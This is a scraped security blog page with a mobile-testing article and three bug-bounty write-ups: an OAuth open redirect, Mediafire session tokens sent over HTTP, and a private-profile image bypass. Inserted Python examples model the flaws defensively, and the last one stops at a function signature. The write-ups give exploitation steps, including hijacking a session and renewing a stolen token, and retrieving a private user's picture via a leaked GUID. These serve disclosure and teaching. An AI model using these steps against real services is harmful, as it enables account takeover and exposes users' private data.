COMPUTER KORNER<br />
Best Practices For Mobile Device Testing (2021-08-31)<center><span id="docs-internal-guid-f1d42da3-7fff-edae-7d0e-cd37774781c2"><span style="color: white;"><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 401px; overflow: hidden; width: 602px;"><img height="401" src="https://lh3.googleusercontent.com/eLQG4pjfsORH88dNeHpnI__1fAWcf7F-pzoSOWyPwq6VehkVPB33Q3fk1GnsZCdZ1U6H6zjKpLhpJVmPBCdVoPrdlFI2roriKBiGRUtYJJBotsytoB2FezUVP2Tx12d-fe5RNwYN=s0" style="margin-left: 0px; margin-top: 0px;" width="602" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Photo by </span><a href="https://unsplash.com/@freestocks?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">freestocks</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> on </span><a 
href="https://unsplash.com/s/photos/mobile-device-testing?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Unsplash</span></a></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Mobile testing</span><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> is done to confirm that all of a device's features, including its hardware and other software components, are functioning effectively. Technically speaking, it is called the mobile device quality check, which ensures that the software and hardware comply with the actual customer's needs. In testing, all the hardware and software components are tested out.</span></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Types of Mobile Device Testing</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Testing of mobile devices varies from business to business. 
However, these are the kinds of tests usually involved in </span><a href="https://www.perfecto.io/blog/mobile-testing" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">device testing</span></a><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Unit Testing</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">A mobile device is made up of a number of components, such as the display, the charging port, the vibration motor, and the front and back cameras. In </span><a href="https://en.wikipedia.org/wiki/Unit_testing" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">unit testing</span></a><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">, every component of the mobile device gets separately tested. If a faulty component is installed in the mobile phone, it becomes very costly to get the phone back to the production line to change a single component. 
Thus, each component gets tested separately before getting installed in the device. This includes testing whether the display is working correctly and whether the camera is behaving correctly.</span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Factory Testing</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">After the components get installed in the mobile device, the device gets tested again to find out whether all the components are working properly or not. This is done because there might be some defect in the components that get introduced during the manufacturing or assembling of the hardware. 
So there are various ways by which these devices get tested.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Some types are related to factory testing:</span></p><br /><ol style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Hardware testing</span><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: In this testing, various components of the hardware get tested, like the power button, display of the mobile phone, camera, sim card slot, etc. 
If there are any defects, the device is sent back to production to change those components.</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Signal receiving testing</span><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: Signal receiving tests are performed to check whether all the network access points, such as 3G, 4G, and Wi-Fi, are working properly and are receiving a good amount of signal. This is the most important component of a mobile phone. If the phone is not able to receive any signal, calling, the internet, and other components will not work. 
It also tests to check how much signal is being received by the mobile phone.</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Battery charging testing</span><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: This testing is performed to verify whether the phone battery is charging correctly or if there is a defect in the charging capability.</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Reliability testing</span><span style="font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: Devices get tested against extreme heat and are thrown on the floor to find out how reliable they are. This is done as users might use them in extreme weather conditions or accidentally drop their phones. 
Therefore, it is necessary to test out the reliability of the mobile phone.</span></p></li></ol><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Certification Testing</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This type of testing determines whether the device is suitable to launch in the market and doesn't adversely affect people's health. Devices that are potential health hazards cannot be launched because they could injure people, expose the company to lawsuits, ruin the company's image, and cost a lot to recall. Therefore, it is crucial to ensure that comprehensive certification testing is done.</span></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Functional Testing Performed on Devices</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><a href="https://www.guru99.com/functional-testing.html" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Functional testing</span></a><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> is software testing that is carried out keeping in mind the functional requirements of the product. Given below are two types of functional testing.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 197px; overflow: hidden; width: 602px;"><img height="197" src="https://lh4.googleusercontent.com/Xa-DT1S5p9qW39U7TtlJid2bEJy4xjlKeHsi3CicZC9BggKxBqmRtO5CiTig7Gq1bu4UpgNpZvKrLXefKj08OE5W4iyzqI0vF7FXe0CYeTRZPrwTRk8GXA5CCuCdOLufoYIoDRw3=s0" style="margin-left: 0px; margin-top: 0px;" width="602" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://geteasyqa.com/qa/usability-testing/" style="text-align: left; text-decoration-line: none;"><span style="font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Source</span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Usability Testing</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: 
justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The ease of using a device is determined through usability testing. The device gets tested from the user's perspective. The camera is used to take selfies, landscape images, and other photos that a user is likely to click so that the camera quality can be tested. Other things like the call quality, the quality of the speaker and microphone, are also tested from a user's perspective. This is done so that the user doesn't have any problem using the device.</span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Static Code Analysis</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Static code analysis is done when the mobile manufacturers have themselves developed part of the operating system. 
Nowadays, almost every mobile device uses a manufacturer's variant of Android OS, such as </span><a href="https://en.miui.com/" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">MIUI</span></a><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">, </span><a href="https://www.oneplus.in/oxygenos" style="text-decoration-line: none;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Oxygen OS</span></a><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">, etc. The manufacturers modify some of the open source code to integrate some of their specific features, such as an AI camera and other components. These modified parts of the OS need to be tested to ensure that they are properly integrated and functioning. 
Sometimes, the software may have some defects, which can cause problems like all the images getting blurred when taken with that feature.</span></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">There are a lot of different testing approaches that are followed by companies apart from functional testing. They do have their own testing methods, which they use to perform various types of tests. These tests are performed to test out the quality of the software being installed in the phone and the hardware being used to make the phone. This is done so that the end-user doesn't have any problem, as these errors are directly connected to the company's reputation. A bad device results in a user deciding not to buy another device from the same company. Thus these tests are very necessary for the growth of the company.</span></p></span></span><form action="https://www.paypal.com/cgi-bin/webscr" method="post"><span style="color: white;"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /></span> </form>
</center>
Posted by Jitendra<br />
<br />
Open Redirection in OAuth (2018-08-02)<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Hi there,</b><br />
<b><br /></b>
<b><br /></b>
<b>I am fond of testing APIs. Whenever a bug bounty program launches, the first thing I check is whether they have an API or not. I have tested the APIs of many websites, like Mapbox and Mediafire, and found many issues.</b><br />
<b><br /></b>
<b><br /></b>
<b>Now I stumbled across a website; I don't want to disclose its name, so let's call it example.com. On example.com you can create an application and get data from the users. They have different scopes, like email, phone number, address, etc.</b><br />
<b><br /></b>
<b>Now they are using OAuth for all this. I created an application and started testing it.</b><br />
<b>As soon as I created the application, a client_id and client secret were provided to me (intended).</b><br />
<b><br /></b>
<b>Now the application only allows an HTTPS URL as the redirect_uri. I white-listed a URL and I was ready to go.</b><br />
<b><br /></b>
<b>I gave the scope of email and tried the OAuth URL they provided. Now what is actually going on is that if you provide the wrong scope, you will be redirected to the URL given in the redirect_uri.</b><br />
<b><br /></b>
<b>Now according to RFC 6749:</b><br />
<b><br /></b>
<br />
<pre class="newpage" style="break-before: page; font-size: 13.3333px;">If the request fails due to a missing, invalid, or mismatching
redirection URI, or if the client identifier is missing or invalid,
the authorization server SHOULD inform the resource owner of the
error and MUST NOT automatically redirect the user-agent to the
invalid redirection URI</pre>
<pre class="newpage" style="break-before: page; font-size: 13.3333px;">If the resource owner denies the access request or if the request
fails for reasons other than a missing or invalid redirection URI,
the authorization server informs the client by adding the following
parameters to the query component of the redirection URI using the
"application/x-www-form-urlencoded" format</pre>
<b>Let's take a scenario.</b><br />
<b>There is a website example.com and someone created an application with a white-listed URL, attacker.com.</b><br />
<b><br /></b>
<b>Now in the second paragraph of RFC 6749, many developers misinterpret the words "other than".</b><br />
<b>If the scope parameter is invalid, the authorization server directly redirects the user to that white-listed website without any interaction, and that is how it works as an open redirect.</b><br />
<b><br /></b>
<b>Now this can be used for phishing purposes or for redirecting users to a malicious website.</b><br />
<b><br /></b>
<b>Now they say that this is how OAuth works, but actually, if the scope is invalid, Google and Facebook don't redirect their users to the website mentioned in redirect_uri. Facebook shows this type of error if the scope is invalid:</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK7DQ8qG0aMBOBKG5dCPPNuMeKDGMUtPS7UAEEsToocH08x56bZpETthZLfRixnperHF8f0rvhWSSRsnjhy8Wg__INSe4sml95gI5Nauzt56-SfvWXq2la8Qplo5Z-zPgcICw9dCJlG-0/s1600/not+redirected.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="695" data-original-width="1360" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK7DQ8qG0aMBOBKG5dCPPNuMeKDGMUtPS7UAEEsToocH08x56bZpETthZLfRixnperHF8f0rvhWSSRsnjhy8Wg__INSe4sml95gI5Nauzt56-SfvWXq2la8Qplo5Z-zPgcICw9dCJlG-0/s320/not+redirected.png" width="320" /></a></div>
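As an added illustration (example code, not the post's or example.com's), the two error policies contrasted above side by side: a minimal authorization-endpoint validator that keeps the RFC 6749 section 3.1.2.4 rule of never redirecting on a bad client_id or redirect_uri, and then either auto-redirects on an invalid scope (the behaviour reported here) or shows an error page instead (the Google/Facebook behaviour). The client registry and scope list are constructed, and "attacker-app" stands in for the scenario's client with attacker.com white-listed.

```python
"""Added example: authorization-endpoint error handling with and without the
open-redirect behaviour. Client registry and scopes are constructed."""
from urllib.parse import urlencode, urlsplit, urlunsplit

# Constructed client registry: client_id -> exactly registered redirect URIs.
# "attacker-app" is the scenario's client whose white-listed URI is attacker.com.
CLIENTS = {
    "good-app": {"https://app.example.net/callback"},
    "attacker-app": {"https://attacker.com/"},
}
SUPPORTED_SCOPES = {"email", "phone", "address"}


def _append_error(redirect_uri, error, state=None):
    """Add error (and state) to the query component, as RFC 6749 4.1.2.1 describes."""
    parts = urlsplit(redirect_uri)
    extra = {"error": error}
    if state:
        extra["state"] = state
    query = (parts.query + "&" if parts.query else "") + urlencode(extra)
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, parts.fragment))


def authorize(params, redirect_on_invalid_scope):
    """Validate an authorization request and decide how to report errors.

    Returns ("error_page", message), ("redirect", url) or ("consent", scopes).
    redirect_on_invalid_scope=True reproduces what the post observed: an
    invalid scope is bounced to the registered redirect_uri with no user
    interaction, so the authorization endpoint redirects to any white-listed
    site. False shows an error page instead, as the post says Google and
    Facebook do.
    """
    client_id = params.get("client_id")
    redirect_uri = params.get("redirect_uri")
    state = params.get("state")
    registered = CLIENTS.get(client_id)
    # RFC 6749 3.1.2.4: unknown client or unregistered redirect_uri -> never redirect.
    if registered is None or redirect_uri not in registered:
        return ("error_page", "unknown client_id or unregistered redirect_uri")
    requested = set(params.get("scope", "").split())
    if not requested or not requested <= SUPPORTED_SCOPES:
        if redirect_on_invalid_scope:
            # The user lands on the registered site without ever seeing a consent screen.
            return ("redirect", _append_error(redirect_uri, "invalid_scope", state))
        return ("error_page", "invalid scope requested by this application")
    # A valid request reaches the consent screen; a denial there is a decision
    # the user made, so redirecting with access_denied is the RFC's normal path.
    if params.get("user_decision") == "deny":
        return ("redirect", _append_error(redirect_uri, "access_denied", state))
    return ("consent", sorted(requested))
```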
<b>Now after all this, I reported this bug to example.com and they denied it by saying that this is how OAuth works. And after a long trail of comments they said: we are going to operate our API according to RFC 6749. That's it.</b><br />
<b><br /></b>
<b>So everything is up to them, whether they want to make changes to protect their users or not.</b><br />
<b><br /></b>
<b>Credits </b><br />
<b><a href="http://blog.intothesymmetry.com/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html">http://blog.intothesymmetry.com/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html</a></b><br />
<b><br /></b>
And the mitigations that were provided by John Bradley and Hannes Tschofenig can be found here: <a href="https://tools.ietf.org/id/draft-bradley-oauth-open-redirector-01.txt">https://tools.ietf.org/id/draft-bradley-oauth-open-redirector-01.txt</a><br />
<br />
<br />
<b><br /></b>
<b>Thanks </b><br />
<b>Jitendra Kumar Singh(Team Computerkorner)</b><br />
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!</b><br />
</div>
Posted by Jitendra<br />
<br />
Insufficient Transport Layer Protection: Mediafire Android Application (2018-07-30)<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b>It has been quite a long time since I published my last post; sorry for keeping you waiting.</b><br />
<b><br /></b>
<b>So this is the story of a bug which I actually found in the Mediafire Android application.</b><br />
<b>First of all, I want to clarify that I never use rooted devices, since rooting removes the most important security feature (the restriction on access to the /data/data folder).</b><br />
<b><br /></b>
<b>Now lets stick to the bug.</b><br />
<b><br /></b>
<b>So after testing their API and web application (I found about 10+ issues there), it was time to take a look at their Android application.</b><br />
<b>So I installed their application directly from the Play Store and configured Burp to listen to all the traffic coming from my device. Now let's start testing.</b><br />
<b><br /></b>
<b>I had been playing with the Android application for the past 3-4 hours, but I was not able to find any issue. Actually, they are using the API there, which I had already tested.</b><br />
<b>Now I started looking for issues like: every request that goes out with a session token has to be over HTTPS. Suddenly I noticed a request, and it disappeared in seconds from the HTTP history tab of Burp.</b><br />
<b>Now I started digging, as that request didn't have the HTTPS protection.</b><br />
<b>Now after looking for some time, I figured out that whenever you preview any image within the Android app, this request goes out:</b><br />
<b><br /></b>
<span style="background-color: #f8f8f8; color: #333333; font-family: "consolas" , "liberation mono" , "courier" , monospace;">http://ww7.mediafire.com/conversion_server.php?fc02&quickkey=<quick_Key_of_file>&doc_type=i&size_id=5&session_token=<session_token_here></span><br />
<br />
<b>Now this request is not going over HTTPS, and this request has the session token as well.</b><br />
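An added example (not code from the post or from Mediafire) of the check the author did by eye in the Burp history: scan captured request lines and flag any plaintext-HTTP request whose query string carries a session credential. The request lines, hostnames and token values are constructed; the paths follow the ones quoted in this post.

```python
"""Added example: find session credentials sent over plaintext HTTP in a
captured request history. Sample lines are constructed."""
from urllib.parse import parse_qs, urlsplit

# Query parameter names that must never travel over plaintext HTTP.
SENSITIVE_PARAMS = {"session_token", "token", "access_token", "sessionid"}

# Constructed proxy-history sample, one "<METHOD> <URL>" per line; hostnames
# and token values are placeholders, paths follow the ones in the post.
CAPTURED = """\
GET https://www.example-host.test/api/1.5/user/get_info.php?session_token=TOKEN_A
GET http://ww7.example-host.test/conversion_server.php?fc02&quickkey=KEY1&doc_type=i&size_id=5&session_token=TOKEN_A
GET http://cdn.example-host.test/static/logo.png
POST https://www.example-host.test/api/1.5/user/renew_session_token.php?session_token=TOKEN_A
GET http://ww7.example-host.test/conversion_server.php?quickkey=KEY2&doc_type=i&Session_Token=TOKEN_B
"""


def find_plaintext_credentials(history, sensitive=SENSITIVE_PARAMS):
    """Return (line_number, host, parameter) for each plaintext HTTP request
    that carries a sensitive query parameter.

    Parameter names are compared case-insensitively: the server decides which
    spellings it accepts, so a scanner should not assume one."""
    findings = []
    for lineno, line in enumerate(history.splitlines(), start=1):
        if not line.strip():
            continue
        _method, _, url = line.partition(" ")
        parts = urlsplit(url)
        if parts.scheme.lower() != "http":
            continue  # TLS-protected (or not a URL at all); not the bug in this post
        # keep_blank_values so bare flags such as "fc02" stay in the parsed query
        for name in parse_qs(parts.query, keep_blank_values=True):
            if name.lower() in sensitive:
                findings.append((lineno, parts.hostname, name))
    return findings


if __name__ == "__main__":
    for lineno, host, name in find_plaintext_credentials(CAPTURED):
        print(f"line {lineno}: {name} sent in the clear to {host}")
```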
<b><br /></b>
<br />
<h3 style="text-align: left;">
<span style="font-size: small;">How to Exploit:-</span></h3>
<div>
<b>Now if the victim is using a public Wi-Fi (a malicious user's Wi-Fi), that malicious user can intercept the request and can take over the victim's account with the session. Now there is a catch as well: the session token is only valid for 10 minutes, and if you try to send a request after an idle time of 10 minutes, you have to enter the password to re-authenticate yourself, after which a new session token will be generated.</b></div>
<div>
<b>But there is an endpoint where you can renew the session token; you just have to send the request before the 10-minute idle time.</b></div>
<div>
<b><br /></b></div>
<div>
<span style="background-color: #f8f8f8; color: #333333; font-family: "consolas" , "liberation mono" , "courier" , monospace;">https://www.mediafire.com/api/1.5/user/renew_session_token.php?session_token=<TOKEN_YOU_GOT></span></div>
<b>Now you have everything: you can take over the user session without getting a session timeout.</b><br />
<b><br /></b>
<b>Timeline</b><br />
<b>5 April 2016 17:25:36: Bug found</b><br />
<b>5 April 2016 17:36:37: Reported to Mediafire</b><br />
<b>7 April 2016 22:57:00: More information sent about renewing the session token to bypass the password requirement.</b><br />
<b>8 April 2016 00:52:33: Report is Triaged</b><br />
<b>8 April 2016 00:53:04: Bug is fixed</b><br />
<b>8 April 2016 (I don't remember the time): Update issued for the Android application.</b><br />
<b><br /></b>
<b><br /></b>
<b>It was my pleasure to work with the Mediafire security team, as they were very fast in fixing the issue and issuing the update.</b><br />
<b><br /></b>
<b><br /></b>
<b>That's all for this post; let me know your opinion in the comment section.</b><br />
<b><br /></b>
<b>Thanks</b><br />
<b>Jitendra Kumar Singh(Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<br />
</div>
Posted by Jitendra<br />
<br />
Bypassing Private Profile Restrictions (2018-03-12)<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b><br /></b>
<b>So this post is about bypassing the private profile restrictions on a private program on HackerOne. I will not disclose the program name, so let's call it example.com.</b><br />
<b><br /></b>
<b><br /></b>
<b>So I got an invitation to a private program on HackerOne. I created an account on it; it was a file hosting service where you can host all your files.</b><br />
<b><br /></b>
<b>I started testing it. I created an account and started doing reconnaissance on it as well.</b><br />
<b>After creating a profile, in the settings there were two options: private profile and public profile.</b><br />
<b>They create a page for a user on a subdomain, like imgur does. Anyone can visit there and can see some basic info about the user. But if your profile is private, no one can see your profile, your profile picture, etc.</b><br />
<b><br /></b>
<b>So I started looking for a bypass of these private profile restrictions. </b><br />
<b><br /></b>
<b>1. If a user visits the profile image URL directly, they will be able to download the profile picture of the user even if the profile is private. But the image URL looks like this: https://subdomain.example.com/api/people/1768280b-8a78-463a-bdb9-f1a96835f466/profileImage</b><br />
<b>So it would be hard to predict this random alphanumeric value, </b><b>1768280b-8a78-463a-bdb9-f1a96835f466, to retrieve the profile picture of the user.</b><br />
<b>So it was a failed attempt.</b><br />
<b><br /></b>
<b>2. Now when you log in, there is a request whose response contains an id parameter which looks like this: "id":"0a7561f5-dcd0-412e-bed3-f5734da4ddbd". If you substitute this for the value in step 1, an image is downloaded, but it was not the real image of the user.</b><br />
<b><br /></b>
<b>3. So after further investigation I found that this alphanumeric value is the GUID of a person.</b><br />
<b>So I was testing some of the file sharing functionality on that site.</b><br />
<b>Now I configured Burp to capture all the requests and responses coming from it. Whenever a person shares a file with a person who has a private account on example.com, there is a parameter in the response which leaks that person's GUID: </b><br />
<br />
<b>"profileImageUrl":"/api/people/00000000-0000-0000-0000-000000000000/profileImage","personGuid":"efef3e0b-a3b8-4fa9-b548-d23baccc96d1"</b><br />
<b><br /></b>
<b>Now you can see that the value in profileImageUrl is all zeros, but personGuid has an interesting value. Just replace the zeros with the value in personGuid and you can download the profile picture of the user.</b><br />
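The root cause in the steps above is that the profileImage endpoint trusts an unguessable GUID instead of checking whether the caller is allowed to see a private profile, and a second response hands out that GUID. Here is an added example in Python (not the program's code; the users, GUIDs and image bytes are constructed placeholders) that models the vulnerable handler next to a hardened one, plus the share response with the identifier omitted for private accounts:

```python
"""Added example, not the program's own code: a GUID in a URL is an identifier,
not an authorization decision. Models the profileImage endpoint from the post
with a vulnerable handler beside a hardened one. All users, GUIDs and image
bytes are constructed placeholders, not values from the page."""
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    guid: str
    private: bool
    image: bytes


# Constructed sample users (GUIDs are placeholders).
ALICE = User("11111111-1111-4111-8111-111111111111", private=True, image=b"PNG:alice")
BOB = User("22222222-2222-4222-8222-222222222222", private=False, image=b"PNG:bob")
USERS = {u.guid: u for u in (ALICE, BOB)}

ZERO_GUID = "00000000-0000-0000-0000-000000000000"


def profile_image_vulnerable(person_guid, requester_guid=None):
    """The behaviour in the post: whoever knows the GUID gets the image,
    private or not. The GUID's unpredictability is the only 'protection'."""
    user = USERS.get(person_guid)
    return user.image if user else None


def profile_image_hardened(person_guid, requester_guid=None):
    """Decide on the profile setting and the caller's identity, not on the
    secrecy of the GUID. The post says nobody else can see a private
    profile's picture, so only the owner gets it. An unknown GUID and a
    forbidden one look the same to the caller, so the endpoint cannot be
    used to confirm which GUIDs exist."""
    user = USERS.get(person_guid)
    if user is None:
        return None
    if user.private and requester_guid != user.guid:
        return None
    return user.image


def share_response(recipient_guid):
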